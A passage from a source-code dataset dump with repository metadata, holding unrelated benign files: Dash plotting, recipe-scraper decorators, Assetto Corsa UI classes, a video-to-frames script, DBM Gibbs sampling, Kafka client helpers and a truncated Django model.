for i in sector_dropdown:
sector_file_name=sector_list[i]+'_merge_df.csv'
tempdf=read_merge_data(sector_file_name)
sector_tempdf=tempdf[tempdf['yearmonth']<=selected_year]
traces.append(go.Scatter(
x=sector_tempdf.index,
y=sector_tempdf[yaxis_column_name],
#text=df_by_continent['country'],
mode='lines',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
))
return {
'data': traces,
'layout': go.Layout(
xaxis={
'title': 'Year',
},
yaxis={
'title': yaxis_column_name,
},
margin={'l': 40, 'b': 40, 't': 10, 'r': 0},
hovermode='closest'
)
}
if __name__ == '__main__':
app.run_server(debug=True)
|
[
"jbdx6307@gmail.com"
] |
jbdx6307@gmail.com
|
0f40308406e38359eb00bd87c471b5f1ff5f6778
|
0fba89a7703d883231decbb5b748d4df22832e6a
|
/recipe_scrapers/_decorators.py
|
87fb968ea2b97ba5373f8906f7b9acf4f19879ef
|
[
"MIT"
] |
permissive
|
tobiaghiraldini/recipe-scrapers
|
c66f1fb448f6e696677ec95d43a595be8470e890
|
1ced80d25dcc6e88877c26187990f112f3134e67
|
refs/heads/master
| 2022-07-04T20:31:07.114353
| 2020-05-20T10:42:26
| 2020-05-20T10:42:26
| 262,996,294
| 0
| 0
|
MIT
| 2020-05-11T09:23:45
| 2020-05-11T09:23:45
| null |
UTF-8
|
Python
| false
| false
| 1,895
|
py
|
import functools
from language_tags import tags
from ._schemaorg import SchemaOrgException
class Decorators:
@staticmethod
def schema_org_priority(decorated):
"""
Use SchemaOrg parser with priority (if there's data in it)
On exception raised - continue by default.
If there's no data (no schema implemented on the site) - continue by default
"""
@functools.wraps(decorated)
def schema_org_priority_wrapper(self, *args, **kwargs):
function = getattr(self.schema, decorated.__name__)
if not function:
raise SchemaOrgException(
"Function '{}' not found in schema"
                    .format(decorated.__name__)
)
if not self.schema.data:
return decorated(self, *args, **kwargs)
try:
value = function(*args, **kwargs)
except SchemaOrgException:
return decorated(self, *args, **kwargs)
return value or decorated(self, *args, **kwargs)
return schema_org_priority_wrapper
@staticmethod
def og_image_get(decorated):
@functools.wraps(decorated)
def og_image_get_wrapper(self, *args, **kwargs):
try:
image = self.soup.find(
'meta',
{'property': 'og:image', 'content': True}
)
return image.get('content')
except AttributeError:
return decorated(self, *args, **kwargs)
return og_image_get_wrapper
@staticmethod
def bcp47_validate(decorated):
@functools.wraps(decorated)
def bcp47_validate_wrapper(self, *args, **kwargs):
tag = tags.tag(decorated(self, *args, **kwargs))
return str(tag) if tag.valid else None
return bcp47_validate_wrapper
|
[
"hhursev@gmail.com"
] |
hhursev@gmail.com
|
b3a0f7392ad91b35f21b7aaa9a6aeac03fdbf6f0
|
9457a7eb9c1d64e203d85b45b3337f06768f28af
|
/python/OV1Info/app/classes.py
|
d93f55ea6d4ed1526b1150dbe808cea822cb83ee
|
[] |
no_license
|
acclub/apps
|
1173a7295714086a34f3896ec54025b2eab34290
|
f86e5a56e6908823256133cba83590a31a7fe19c
|
refs/heads/master
| 2021-01-10T14:43:21.392018
| 2016-09-30T21:32:40
| 2016-09-30T21:32:40
| 47,973,886
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,719
|
py
|
import ac
import math
import configparser
class Window:
# INITIALIZATION
def __init__(self, name="defaultAppWindow", title="", icon=True, width=100, height=100, scale=1, texture=""):
# local variables
self.name = name
self.title = title
self.width = width
self.height = height
self.x = 0
self.y = 0
self.is_attached = False
self.attached_l = -1
self.attached_r = -1
# creating the app window
self.app = ac.newApp(self.name)
# default settings
ac.drawBorder(self.app, 0)
ac.setBackgroundOpacity(self.app, 0)
if icon is False:
ac.setIconPosition(self.app, 0, -10000)
# applying settings
ac.setTitle(self.app, self.title)
ac.setBackgroundTexture(self.app, texture)
ac.setSize(self.app, math.floor(self.width*scale), math.floor(self.height*scale))
# PUBLIC METHODS
def onRenderCallback(self, func):
ac.addRenderCallback(self.app, func)
return self
def setBgOpacity(self, alpha):
ac.setBackgroundOpacity(self.app, alpha)
return self
def border(self, value):
ac.drawBorder(self.app, value)
return self
def setBgTexture(self, texture):
ac.setBackgroundTexture(self.app, texture)
return self
def setPos(self, x, y):
self.x = x
self.y = y
ac.setPosition(self.app, self.x, self.y)
return self
def getPos(self):
self.x, self.y = ac.getPosition(self.app)
return self
#-#####################################################################################################################################-#
class Label:
# INITIALIZATION
def __init__(self, window, text = ""):
self.text = text
self.label = ac.addLabel(window, self.text)
self.size = { "w" : 0, "h" : 0 }
self.pos = { "x" : 0, "y" : 0 }
self.color = (1, 1, 1, 1)
self.bgColor = (0, 0, 0, 1)
self.fontSize = 12
self.align = "left"
self.bgTexture = ""
self.opacity = 1
# PUBLIC METHODS
def setText(self, text):
self.text = text
ac.setText(self.label, self.text)
return self
def setSize(self, w, h):
self.size["w"] = w
self.size["h"] = h
ac.setSize(self.label, self.size["w"], self.size["h"])
return self
def setPos(self, x, y):
self.pos["x"] = x
self.pos["y"] = y
ac.setPosition(self.label, self.pos["x"], self.pos["y"])
return self
def setColor(self, color):
self.color = color
ac.setFontColor(self.label, *self.color)
return self
def setFontSize(self, fontSize):
self.fontSize = fontSize
ac.setFontSize(self.label, self.fontSize)
return self
def setAlign(self, align = "left"):
self.align = align
ac.setFontAlignment(self.label, self.align)
return self
def setBgTexture(self, texture):
self.bgTexture = texture
ac.setBackgroundTexture(self.label, self.bgTexture)
return self
def setBgColor(self, color):
ac.setBackgroundColor(self.label, *color)
return self
def setBgOpacity(self, opacity):
ac.setBackgroundOpacity(self.label, opacity)
return self
def setVisible(self, value):
ac.setVisible(self.label, value)
return self
#-#####################################################################################################################################-#
class Button:
# INITIALIZATION
def __init__(self, window, clickFunc, width=60, height=20, x=0, y=0, text="", texture=""):
self.width = width
self.height = height
self.x = x
self.y = y
self.button = ac.addButton(window, text)
# adding default settings
self.setSize(width, height)
self.setPos(x, y)
if texture != "":
self.setBgTexture(texture)
# default settings
ac.drawBorder(self.button, 0)
ac.setBackgroundOpacity(self.button, 0)
# adding a click event
ac.addOnClickedListener(self.button, clickFunc)
# PUBLIC METHODS
def setSize(self, width, height):
self.width = width
self.height = height
ac.setSize(self.button, self.width, self.height)
return self
def setPos(self, x, y):
self.x = x
self.y = y
ac.setPosition(self.button, self.x, self.y)
return self
def setBgTexture(self, texture):
ac.setBackgroundTexture(self.button, texture)
return self
#-#####################################################################################################################################-#
class Config:
# INITIALIZATION
def __init__(self, path, filename):
self.file = path + filename
self.parser = 0
        try:
            self.parser = configparser.RawConfigParser()
        except Exception:
            ac.console("OV1: Config -- Failed to initialize ConfigParser.")
# read the file
self._read()
# LOCAL METHODS
def _read(self):
self.parser.read(self.file)
def _write(self):
with open(self.file, "w") as cfgFile:
self.parser.write(cfgFile)
# PUBLIC METHODS
def has(self, section=None, option=None):
if section is not None:
# if option is not specified, search only for the section
if option is None:
return self.parser.has_section(section)
# else, search for the option within the specified section
else:
return self.parser.has_option(section, option)
# if section is not specified
else:
ac.console("OV1: Config.has -- section must be specified.")
def set(self, section=None, option=None, value=None):
if section is not None:
# if option is not specified, add the specified section
if option is None:
self.parser.add_section(section)
self._write()
# else, add the option within the specified section
else:
if not self.has(section, option) and value is None:
ac.console("OV1: Config.set -- a value must be passed.")
else:
self.parser.set(section, option, value)
self._write()
# if sections is not specified
else:
ac.console("OV1: Config.set -- section must be specified.")
def get(self, section, option, type = ""):
if self.has(section) and self.has(section, option):
# if option request is an integer
if type == "int":
return self.parser.getint(section, option)
# if option request is a float
elif type == "float":
return self.parser.getfloat(section, option)
# if option request is boolean
elif type == "bool":
return self.parser.getboolean(section, option)
# it must be a string then!
else:
return self.parser.get(section, option)
else:
return -1
def remSection(self, section):
if self.has(section):
self.parser.remove_section(section)
self._write()
else:
ac.console("OV1: Config.remSection -- section not found.")
def remOption(self, section, option):
if self.has(section) and self.has(section, option):
self.parser.remove_option(section, option)
self._write()
else:
ac.console("OV1: Config.remOption -- option not found.")
|
[
"illvdg13@gmail.com"
] |
illvdg13@gmail.com
|
d9e5e750b84c63450d958537f59dbc8b3863f3b4
|
2194df5490666825d382e6e47bd33139b1faf0df
|
/vtools/videotoimage.py
|
ff6b9cb5e919adadbff64930f5eb8a56adafd551
|
[] |
no_license
|
aiporre/video_tools
|
a88a3134c6148bd384c71e846aeab49da6bfab8e
|
f955c22fc7259a4b45592f522bb80f0533e6093d
|
refs/heads/master
| 2021-08-02T21:03:53.344844
| 2021-07-28T16:45:57
| 2021-07-28T16:45:57
| 213,970,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,568
|
py
|
import cv2
import argparse
import os
from tqdm import tqdm
class VideoToImage(object):
def __init__(self, src=0, output_path = './', extension = '.jpg', prefix='frame_', padding=-1):
# Create a VideoCapture object
self.capture = cv2.VideoCapture(src)
self.output_path = output_path
self.frame_counter = 0
# resolution of the video
self.frame_width = int(self.capture.get(3))
self.frame_height = int(self.capture.get(4))
self.n_frames = int(self.capture.get(7))
self.extension = extension
self.prefix = prefix
self.padding = padding
def update(self):
# Read the next frame
if self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
self.frame_counter +=1
def show_frame(self):
# Convert to grayscale and display frames
if self.status:
cv2.imshow('frame', self.frame)
# Press 'q' on keyboard to stop recording
key = cv2.waitKey(1)
if key == ord('q'):
self.capture.release()
cv2.destroyAllWindows()
exit(1)
def save_frame(self):
# Save grayscale frame into video output file
if self.status: # self.capture.isOpened():
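            # with padding > 0 the frame index is zero-padded to 'padding'
            # digits (e.g. padding=5 gives 'frame_00042.jpg'); otherwise the
            # raw counter is used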
if self.padding > 0:
filename = os.path.join(self.output_path, self.prefix + "{1:0{0}}".format(self.padding,self.frame_counter) + self.extension)
else:
filename = os.path.join(self.output_path, self.prefix + str(self.frame_counter) + self.extension)
cv2.imwrite(filename, self.frame)
    def close(self, terminate=False):
        # the flag was renamed from 'exit' so it no longer shadows the
        # builtin exit() called below
        self.capture.release()
        cv2.destroyAllWindows()
        if terminate:
            exit(1)
class VideoToGrayImage(VideoToImage):
def __init__(self, src=0, output_path = './', extension = '.jpg', prefix='frame_', padding=-1):
super(VideoToGrayImage,self).__init__(src=src, output_path = output_path, extension = extension, prefix=prefix, padding=padding)
def update(self):
super().update()
if self.status:
self.frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
def run(video_src, output_path=None, extension ='.png', plot='n', prefix='frame_', padding=-1, gray = 'y'):
    '''
    convert a video into a sequence of per-frame images
    '''
if output_path is None:
output_path = os.path.dirname(video_src)
output_path = os.path.join(output_path,'video_images')
if not os.path.exists(output_path):
os.mkdir(output_path)
if gray == 'y':
video_stream_widget = VideoToGrayImage(video_src, output_path = output_path, extension = extension, prefix=prefix, padding=padding)
else:
video_stream_widget = VideoToImage(video_src, output_path=output_path, extension=extension, prefix=prefix, padding=padding)
if plot == 'y':
        print('stop conversion by pressing q')
for _ in tqdm(range(video_stream_widget.n_frames)):
if video_stream_widget.capture.isOpened():
try:
video_stream_widget.update()
if plot == 'y':
video_stream_widget.show_frame()
video_stream_widget.save_frame()
except AttributeError:
pass
else:
video_stream_widget.close()
video_stream_widget.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert to gray avi videos.')
parser.add_argument('--target', metavar='target', type=str,
help='target avi video full path')
parser.add_argument('--output', metavar='output', type=str,
help='output path where the images are saved')
    parser.add_argument('--plot', metavar='plot', type=str, default='y',
                        help='show video during conversion (y (default) or n)')
    parser.add_argument('--extension', metavar='extension', type=str, default='.jpg',
                        help='extension of the image output (default: .jpg)')
args = parser.parse_args()
video_src = args.target
print(video_src)
video_stream_widget = VideoToGrayImage(video_src, output_path = args.output, extension = args.extension)
    print('stop conversion by pressing q')
while video_stream_widget.capture.isOpened():
try:
video_stream_widget.update()
if args.plot == 'y':
video_stream_widget.show_frame()
video_stream_widget.save_frame()
except AttributeError:
pass
|
[
"ariel.iporre.rivas@gmail.com"
] |
ariel.iporre.rivas@gmail.com
|
4de5a482ac1a2b84b0fc9163f756e769c371d213
|
407d4e49248cc7aa244d75439360b34cd8e57e71
|
/venv/Scripts/easy_install-script.py
|
53ca27394e3788212ea5e8cf08b912eade2cbd08
|
[] |
no_license
|
fati-ma/POS-tagger
|
3c38e26919d6f2a27442bb200e3d6d6fdb57838d
|
d72981cb4976089b68000a43f9c82a9df192605b
|
refs/heads/main
| 2023-07-31T14:25:43.363787
| 2021-09-21T12:46:51
| 2021-09-21T12:46:51
| 408,569,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
#!C:\Users\delta\PycharmProjects\Test11\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"fatima.atiyya@yahoo.com"
] |
fatima.atiyya@yahoo.com
|
4392e82cf5bce518c62400d99c6a9685baa753f0
|
db8ddcd93af0386a2cdf7c06f131c5acbfbcc4af
|
/UE-6.2.py
|
2043ffa531c2ac802df0d8ae21ed5431236ec966
|
[] |
no_license
|
Damanu/CP-UE
|
584a088480d3252e389a70d64c98f64722d35a5d
|
8264839363275cd4f585cec97b7868e1b31e0114
|
refs/heads/master
| 2021-01-10T18:01:14.338989
| 2016-01-14T10:11:31
| 2016-01-14T10:11:31
| 44,479,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 117
|
py
|
#!/usr/bin/python
import matplotlib.pyplot as plt
import numpy as np
import sys
def main():
    # placeholder so the script runs: the exercise body was never written
    pass
if __name__=="__main__":
    main()
|
[
"e.schwarzhans@gmx.at"
] |
e.schwarzhans@gmx.at
|
f6d5e74ffb4eeffb6b0b056154516157ac157cef
|
1edf3c5a83c3d9d1fe63a38a67db667c89ee0642
|
/botTester/unpredictable.py
|
0d9e45bcfb074f7611b9ecea581d00d73c3ce08a
|
[] |
no_license
|
roctbb/GoTo
|
e0ebbb9a70cd4c123a43d980299da043bc8537c2
|
6ba9cca18e106acc2e6d441dd98b597e397ec211
|
refs/heads/master
| 2020-05-21T20:13:52.486735
| 2018-11-18T09:38:35
| 2018-11-18T09:38:35
| 61,876,224
| 3
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
__author__ = 'roctbb'
from random import choice
def step(history):
return choice(["камень", "ножницы","бумага"])
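# the move strings are Russian: "камень" = rock, "ножницы" = scissors,
# "бумага" = paper; they are left untranslated because they are presumably
# matched verbatim by the surrounding botTester harness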
|
[
"roctbb@gmail.com"
] |
roctbb@gmail.com
|
2bccf9d5a6413459ed13f822479d9f1f10160631
|
bbc712831e5adeb0ea3b6434f5bbde63f2cbea34
|
/delete.py
|
be28977592fb44ee804a25878b09ccb81c10ca8f
|
[] |
no_license
|
gls369/database-sample
|
b5add9e46ffb03cc73bf24c55218aeed77efbd23
|
c3da7cbf1bb9c2a504ce7841ffd38da7dffc9bb6
|
refs/heads/master
| 2020-04-12T11:10:22.085991
| 2018-12-20T13:13:29
| 2018-12-20T13:13:29
| 162,451,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import requests
import json
headers = {"Content-Type" : "application/json"}
res = requests.delete("http://127.0.0.1:5000/CV/1", headers=headers)
print (res.text)
|
[
"gls@live.hk"
] |
gls@live.hk
|
caa5d7f22e33db8b41abcb461289fd84c5a814ee
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/40/usersdata/78/24413/submittedfiles/main.py
|
eab508f3756a8f0f59276fbd4bed79017c152c6b
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 332
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import funcoes
#START HERE
m=int(input('digite o valor de m:'))
e=input('digite o valor de epsilon:')
m=funcoes.absoluto(m)
pi=funcoes.pi(m)
cosseno=funcoes.cosseno(pi/5,e)
razaoaurea=funcoes.razaoaurea(m,e)
print('%.15f' %pi)
print('%.15f' %razaoaurea)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
1ea53c97efbef18c6d8500971ef041b011cad8a1
|
4467ac07a53475b5906471de1fd2354d9d277f83
|
/pylearn2/models/dbm/sampling_procedure.py
|
bd6522e1b1bdab962a509475901ff0f3e608629d
|
[] |
no_license
|
YS-L/pylearn2
|
01161cc0b160703aff39c41d2251736a51b0c1ae
|
55e40690f104850bd336952692b17803c01dcb6c
|
refs/heads/master
| 2020-02-26T13:15:24.420474
| 2014-02-19T23:23:41
| 2014-02-19T23:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,080
|
py
|
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "Ian Goodfellow"
from theano.compat import OrderedDict
from pylearn2.utils import py_integer_types
class SamplingProcedure(object):
"""
Procedure for sampling from a DBM.
"""
def set_dbm(self, dbm):
"""
.. todo::
WRITEME
"""
self.dbm = dbm
def sample(self, layer_to_state, theano_rng, layer_to_clamp=None,
num_steps=1):
"""
Samples from self.dbm using `layer_to_state` as starting values.
Parameters
----------
layer_to_state : dict
Maps the DBM's Layer instances to theano variables representing \
batches of samples of them.
theano_rng : theano.sandbox.rng_mrg.MRG_RandomStreams
WRITEME
layer_to_clamp : dict, optional
Maps Layers to bools. If a layer is not in the dictionary, \
defaults to False. True indicates that this layer should be \
clamped, so we are sampling from a conditional distribution \
rather than the joint distribution.
Returns
-------
layer_to_updated_state : dict
Maps the DBM's Layer instances to theano variables representing \
batches of updated samples of them.
"""
raise NotImplementedError(str(type(self))+" does not implement " +
"sample.")
class GibbsEvenOdd(SamplingProcedure):
"""
    The specific sampling schedule used to sample all of the even-indexed
layers of model.hidden_layers, then the visible layer and all the
odd-indexed layers.
"""
def sample(self, layer_to_state, theano_rng, layer_to_clamp=None,
num_steps=1):
"""
.. todo::
WRITEME
"""
# Validate num_steps
assert isinstance(num_steps, py_integer_types)
assert num_steps > 0
# Implement the num_steps > 1 case by repeatedly calling the
# num_steps == 1 case
if num_steps != 1:
for i in xrange(num_steps):
layer_to_state = self.sample(layer_to_state, theano_rng,
layer_to_clamp, num_steps=1)
return layer_to_state
# The rest of the function is the num_steps = 1 case
# Current code assumes this, though we could certainly relax this
# constraint
assert len(self.dbm.hidden_layers) > 0
# Validate layer_to_clamp / make sure layer_to_clamp is a fully
# populated dictionary
if layer_to_clamp is None:
layer_to_clamp = OrderedDict()
for key in layer_to_clamp:
assert (key is self.dbm.visible_layer or
key in self.dbm.hidden_layers)
for layer in [self.dbm.visible_layer] + self.dbm.hidden_layers:
if layer not in layer_to_clamp:
layer_to_clamp[layer] = False
# Assemble the return value
layer_to_updated = OrderedDict()
for i, this_layer in list(enumerate(self.dbm.hidden_layers))[::2]:
# Iteration i does the Gibbs step for hidden_layers[i]
# Get the sampled state of the layer below so we can condition
# on it in our Gibbs update
if i == 0:
layer_below = self.dbm.visible_layer
else:
layer_below = self.dbm.hidden_layers[i-1]
state_below = layer_to_state[layer_below]
state_below = layer_below.upward_state(state_below)
# Get the sampled state of the layer above so we can condition
# on it in our Gibbs step
if i + 1 < len(self.dbm.hidden_layers):
layer_above = self.dbm.hidden_layers[i + 1]
state_above = layer_to_state[layer_above]
state_above = layer_above.downward_state(state_above)
else:
state_above = None
layer_above = None
if layer_to_clamp[this_layer]:
this_state = layer_to_state[this_layer]
this_sample = this_state
else:
# Compute the Gibbs sampling update
# Sample the state of this layer conditioned
# on its Markov blanket (the layer above and
# layer below)
this_sample = this_layer.sample(state_below=state_below,
state_above=state_above,
layer_above=layer_above,
theano_rng=theano_rng)
layer_to_updated[this_layer] = this_sample
        # Sample the visible layer
vis_state = layer_to_state[self.dbm.visible_layer]
if layer_to_clamp[self.dbm.visible_layer]:
vis_sample = vis_state
else:
first_hid = self.dbm.hidden_layers[0]
state_above = layer_to_updated[first_hid]
state_above = first_hid.downward_state(state_above)
vis_sample = self.dbm.visible_layer.sample(state_above=state_above,
layer_above=first_hid,
theano_rng=theano_rng)
layer_to_updated[self.dbm.visible_layer] = vis_sample
# Sample the odd-numbered layers
for i, this_layer in list(enumerate(self.dbm.hidden_layers))[1::2]:
# Get the sampled state of the layer below so we can condition
# on it in our Gibbs update
layer_below = self.dbm.hidden_layers[i-1]
# We want to sample from each conditional distribution
# ***sequentially*** so we must use the updated version
# of the state for the layers whose updates we have
            # calculated already, in layer_to_updated.
# If we used the original value from
# layer_to_state
# then we would sample from each conditional
# ***simultaneously*** which does not implement MCMC
# sampling.
state_below = layer_to_updated[layer_below]
state_below = layer_below.upward_state(state_below)
# Get the sampled state of the layer above so we can condition
# on it in our Gibbs step
if i + 1 < len(self.dbm.hidden_layers):
layer_above = self.dbm.hidden_layers[i + 1]
state_above = layer_to_updated[layer_above]
state_above = layer_above.downward_state(state_above)
else:
state_above = None
layer_above = None
if layer_to_clamp[this_layer]:
this_state = layer_to_state[this_layer]
this_sample = this_state
else:
# Compute the Gibbs sampling update
# Sample the state of this layer conditioned
# on its Markov blanket (the layer above and
# layer below)
this_sample = this_layer.sample(state_below=state_below,
state_above=state_above,
layer_above=layer_above,
theano_rng=theano_rng)
layer_to_updated[this_layer] = this_sample
# Check that all layers were updated
assert all([layer in layer_to_updated for layer in layer_to_state])
# Check that we didn't accidentally treat any other object as a layer
assert all([layer in layer_to_state for layer in layer_to_updated])
# Check that clamping worked
assert all([(layer_to_state[layer] is layer_to_updated[layer]) ==
layer_to_clamp[layer] for layer in layer_to_state])
return layer_to_updated
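# A minimal, dependency-free sketch (not part of pylearn2) of the visitation
# order GibbsEvenOdd.sample() implements above: even-indexed hidden layers
# first, then the visible layer, then odd-indexed hidden layers. The "h0"/"v"
# names are hypothetical stand-ins for real Layer objects.
def even_odd_order(n_hidden):
    order = ["h%d" % i for i in range(0, n_hidden, 2)]   # even-indexed hiddens
    order.append("v")                                    # visible layer
    order += ["h%d" % i for i in range(1, n_hidden, 2)]  # odd-indexed hiddens
    return order

print(even_odd_order(4))  # ['h0', 'h2', 'v', 'h1', 'h3']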
|
[
"markus.roth@herr-biber.de"
] |
markus.roth@herr-biber.de
|
6648b654370e9eee63bebb282364304a07b5731a
|
c422b95417eaa7ce3707f2b47c0742b53b726c19
|
/pyrandall/kafka.py
|
65c6fc3c280bc5fc38dedd7ab97e5fca6b427f18
|
[
"Apache-2.0"
] |
permissive
|
e7dal/pyrandall
|
ebd05aac5767fce7b4f148e1fac9b19d7b89c5a3
|
0d170fd6ad25332dfc819db1be09cdc2736a5e4c
|
refs/heads/master
| 2021-01-05T17:49:01.623306
| 2019-09-27T11:33:58
| 2019-09-27T11:33:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,573
|
py
|
import configparser
import io
import logging
import os
import sys
import time
from enum import Enum
from typing import Dict
from confluent_kafka.cimpl import Consumer, KafkaError, KafkaException, Producer
log = logging.getLogger("kafka")
class ConsumerState(Enum):
PARTITIONS_UNASSIGNED = 0
PARTITIONS_ASSIGNED = 1
TIMEOUT_SET = 2
class KafkaConn:
def __init__(self):
self.consume_lock = ConsumerState.PARTITIONS_UNASSIGNED
# callback for consumer partition assignment,
# removes lock for actual consumption
def callback_on_assignment(self, consumer, partitions):
self.consume_lock = ConsumerState.PARTITIONS_ASSIGNED
log.info(f"Assignment: {partitions}")
def check_connection(self):
def check_callback(error, event):
if error:
if error.code() == KafkaError._MSG_TIMED_OUT:
                    log.error(
                        "This timeout might indicate the broker is down or the connection is misconfigured"
                    )
log.error(f"Error while producing initial msg: {error}")
sys.exit(1)
config = ConfigFactory(kafka_client="producer").config
config["delivery.timeout.ms"] = "3000" # 3 seconds
prod = Producer(config)
prod.produce("pyrandall", "starting simulate", callback=check_callback)
prod.flush() # block until callback is called
def prod_reporter(self, error, event):
if error:
log.error(f"Error producing the event: {error}")
else:
log.info(
f"Event produced, topic: {event.topic()}, \
partition: {event.partition()}"
)
def produce_message(self, topic, body, headers=None, partition_key=None):
        # default to an empty header dict; the original left msg_headers
        # undefined (a NameError) whenever headers was actually passed in
        msg_headers = headers if headers is not None else {}
        self._produce(topic, body, partition_key, msg_headers)
self.producer.flush()
def init_producer(self):
log.info("starting produce")
kafka_config_producer = ConfigFactory(kafka_client="producer")
config = kafka_config_producer.config
log.info("kafka config for produce %s", config)
self.check_connection()
self.producer = Producer(config)
def _produce(self, topic, msg, partition_key=None, headers=None):
try:
if partition_key:
self.producer.produce(
topic, msg, key=partition_key, callback=self.prod_reporter
)
else:
self.producer.produce(topic, msg, callback=self.prod_reporter)
print(".", end="")
except BufferError:
log.error(
"%% Local producer queue is full (%d messages \
awaiting delivery): try again",
len(self.producer),
)
    # The consume function contains a lock; the lock is removed when the
    # partitions are assigned (max 60 seconds). After assignment the regular
    # timeouts are used. These should be set to a couple of seconds in the
    # scenario itself.
def consume(self, topic, topic_timeout):
kafka_config_consumer = ConfigFactory(kafka_client="consumer")
config = kafka_config_consumer.config
log.info("kafka config for consume %s", config)
kcons = Consumer(config)
events = []
start_time = time.monotonic()
timeout_start_time = start_time
timeout_consumer = 60.0
# actual consumer starts now
# subscribe to 1 or more topics and define the callback function
# callback is only received after consumer.consume() is called!
kcons.subscribe([topic], on_assign=self.callback_on_assignment)
        log.info("Waiting for partition assignment ... (timeout at 60 seconds)")
try:
while (time.monotonic() - timeout_start_time) < timeout_consumer:
# start consumption
messages = kcons.consume(timeout=0.1)
# check for partition assignment
if self.consume_lock == ConsumerState.PARTITIONS_UNASSIGNED:
# this should not happen but we are not 100% sure
if messages:
log.error("messages consumed but lock is unopened")
break
continue
# after partition assignment set the timeout again
# and reset the start time from which to determine timeout
# violation
elif self.consume_lock == ConsumerState.PARTITIONS_ASSIGNED:
timeout_start_time = time.monotonic()
timeout_consumer = topic_timeout
self.consume_lock = ConsumerState.TIMEOUT_SET
log.info("Lock has been opened, consuming ...")
            # append messages to the events list to be returned
if messages:
for msg in messages:
log.info(
f"message at offset: {msg.offset()}, \
partition: {msg.partition()}, \
topic: {msg.topic()}"
)
events.append(msg.value())
else:
# at the end check if the partition assignment was achieved
if self.consume_lock != ConsumerState.TIMEOUT_SET:
log.error("No partition assignments received in time")
except KafkaException as e:
log.error(f"Kafka error: {e}")
pass
finally:
kcons.close()
end_time = time.monotonic()
log.debug(f"this cycle took: {(end_time - start_time)} seconds")
return events
class ConfigFactory:
def __init__(self, kafka_client=None, fpath=None):
self.config = {}
kafka_properties = os.environ.get("KAFKA_PROPERTIES")
if fpath is not None:
# print("fpath")
self.config = self.from_properties(fpath)
elif kafka_properties:
# print("kafka_properties")
self.config = self.from_properties(kafka_properties)
else:
# print("from_env")
self.config = self.from_env()
if kafka_client == "consumer":
self.config["group.id"] = "pyrandall-test"
self.config["auto.offset.reset"] = "earliest"
# self.config['debug'] = "topic,msg,broker"
self.config["enable.partition.eof"] = "false"
elif kafka_client == "producer":
# self.config['debug'] = "topic,msg,broker"
self.config["max.in.flight.requests.per.connection"] = 1
self.config["enable.idempotence"] = True
self.config["retries"] = 1
self.config["delivery.timeout.ms"] = "30000" # 30 seconds
pass
@staticmethod
def from_env() -> Dict[str, str]:
config = {}
broker = os.environ.get("KAFKA_BOOTSTRAP_SERVERS", "localhost:9092")
config["bootstrap.servers"] = broker
return config
@staticmethod
def from_properties(fpath) -> Dict[str, str]:
section = "root"
with open(fpath) as f:
ini_str = io.StringIO(f"[{section}]\n" + f.read())
parser = configparser.ConfigParser()
parser.read_file(ini_str, "strioIO")
# check parsing was done correctly
assert parser.sections() == [section]
return dict(parser.items(section))
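# Standalone sketch of the trick ConfigFactory.from_properties() uses above:
# configparser needs a section header, so a fake "[root]" section is prepended
# before parsing a sectionless Java-style properties payload. The payload here
# is illustrative only, not a real pyrandall configuration.
import configparser
import io

payload = "bootstrap.servers=localhost:9092\ngroup.id=demo\n"
parser = configparser.ConfigParser()
parser.read_file(io.StringIO("[root]\n" + payload), "demo")
print(dict(parser.items("root")))
# {'bootstrap.servers': 'localhost:9092', 'group.id': 'demo'}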
|
[
"stefano.oldeman@gmail.com"
] |
stefano.oldeman@gmail.com
|
074b33472fa2500bb79a13979ce9a9d46cd08fc4
|
764263f101d81d6c0dd9c7afc7d7a2a7db9a389b
|
/DoAnApi/models/comment.py
|
c7d8e0ea3e3930d639b4feb8e848d21df41b6ec0
|
[] |
no_license
|
nhucsau1995/DoAn
|
9008522aea31117ae6c7057e51550c5dd35608b9
|
68366c8f4e3ac0fd3f8c81afed8ab4e67ae22765
|
refs/heads/master
| 2021-09-06T07:14:11.666586
| 2017-12-12T02:01:34
| 2017-12-12T02:01:34
| 112,214,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
from django.db import models
from .userpj import User
from .post import Post
class Comment(models.Model):
objects = models.Manager()
user_id = models.ForeignKey(User, on_delete=models.CASCADE)
post_id = models.ForeignKey(Post, on_delete=models.CASCADE)
content = models.TextField(null=False, blank=False)
created_at = models.DateTimeField(auto_now_add=True, auto_now=False, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=True)
def __str__(self):
